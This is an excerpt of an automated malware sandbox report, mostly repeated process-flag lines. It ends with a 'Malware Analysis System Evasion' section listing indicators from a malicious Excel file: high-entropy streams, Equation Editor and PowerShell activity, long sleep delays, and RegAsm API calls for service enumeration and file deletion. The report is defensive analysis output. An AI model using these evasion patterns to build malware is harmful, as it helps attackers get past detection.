            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: Ref19920830281982938RT.xlsStream path 'Workbook' entropy: 7.99843135762 (max. 8.0)
            Source: FE430000.0.drStream path 'Workbook' entropy: 7.99840684995 (max. 8.0)
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

            Malware Analysis System Evasion

            barindex
            Delayed program exit found
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040F7A7 Sleep,ExitProcess,17_2_0040F7A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,17_2_0041A748
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 491Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1920Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1480Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8365Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3528Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 482Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9303Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1687Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3320Thread sleep time: -300000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exe TID: 3444Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3536Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640Thread sleep count: 1480 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3640Thread sleep count: 8365 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -1200000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep count: 3528 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep count: 482 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3948Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4000Thread sleep count: 176 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4000Thread sleep time: -88000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004Thread sleep count: 237 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004Thread sleep time: -711000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4080Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004Thread sleep count: 9303 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4004Thread sleep time: -27909000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
